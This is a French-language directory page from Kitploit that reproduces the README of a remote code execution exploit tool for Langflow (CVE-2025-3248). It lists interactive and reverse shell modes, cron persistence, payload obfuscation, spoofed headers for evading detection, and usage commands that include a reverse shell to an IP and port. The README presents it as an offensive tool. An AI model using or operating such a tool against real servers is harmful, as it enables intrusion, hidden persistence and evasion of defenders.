Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
langflow-rce-exploit — Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248) - [ Par S4Tech ] | Kitploit
Outils/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalade de PrivilègesMécanismes de PersistanceAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
7112il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248) - [ Par S4Tech ]

Voir le dépôt

Exploit RCE Langflow (CVE-2025-3248)

Python Version License Platform

Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248)

Fonctionnalités

  • Détection automatique des vulnérabilités
  • Modes d'exploitation multiples :
    • Shell interactif
    • Exécution d'une seule commande
    • Connexion de shell inverse
  • Capacité de téléversement de fichiers
  • Interface utilisateur colorisée
  • Méthodes multiples de shell inverse
  • Persistance de l'historique des commandes

📌 Journal des modifications (v2.0)

✨ Nouvelles fonctionnalités :

  • Système de payload avancé avec 5 méthodes d'exécution
  • Téléchargement/téléversement de fichiers avec encodage Base64
  • Persistance via des tâches cron (commande persist)
  • Améliorations du shell interactif :
    • upload chemin_local chemin_distant
    • download chemin_distant chemin_local
    • Commande clear pour le terminal

🛡️ Améliorations de sécurité :

  • Obfuscation automatique des payloads (Base64 + variantes aléatoires)
  • Rotation des en-têtes par requête :
    • User-Agent aléatoire
    • Adresses IP X-Forwarded-For usurpées
  • Contournement HTTPS (prise en charge des certificats auto-signés)
  • Pas de redirections pour éviter la détection

⚡ Améliorations techniques :

  • Vérification de vulnérabilité en plusieurs étapes
  • Gestion améliorée des erreurs pour les connexions instables
  • Journalisation complète des sessions dans exploit_log.txt
  • Persistance de l'historique des commandes (.langflow_shell_history)

📊 Comparaison des versions :

Fonctionnalitév1.0v2.0
Méthodes de payload15
Transfert de fichiers❌ Non pris en charge✅ Pris en charge
Persistance❌✅
FurtivitéBasiqueAvancée
Journalisation de session❌✅

🐛 Corrections de bugs :

  • Correction des problèmes de connexion HTTPS
  • Meilleure gestion des caractères spéciaux dans les commandes
  • Stabilisation de la fiabilité du shell inverse

Prérequis

  • Python 3.6 ou plus récent
  • Bibliothèques requises :
    • requests
    • colorama
    • readline

Installation

git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Utilisation

python exploit.py <URL> [options]

Options disponibles :

OptionDescription
--shellDémarrer un shell interactif
--reverse IP PORTLancer un shell inverse vers IP:PORT donné
--command CMDExécuter une seule commande
--verboseActiver la sortie détaillée
--timeout SECDéfinir le délai d'attente des requêtes (défaut : 10s)

Exemples :

  1. Vérifier la vulnérabilité :
python exploit.py http://target.com
  1. Démarrer un shell interactif :
python exploit.py http://target.com --shell
  1. Exécuter une seule commande :
python exploit.py http://target.com --command "whoami"
  1. Lancer un shell inverse :
python exploit.py http://target.com --reverse 192.168.1.100 4444

Captures d'écran

Image.png)

Avertissement

âڑ ï¸ڈ Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
âڑ ï¸ڈ Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Auteur

  • Mr.SaMi
    Twitter
    Instagram

Contribution

Les pull requests sont les bienvenues. Pour des changements majeurs, veuillez d'abord ouvrir une issue pour discuter de ce que vous souhaitez modifier.

Télécharger l’outil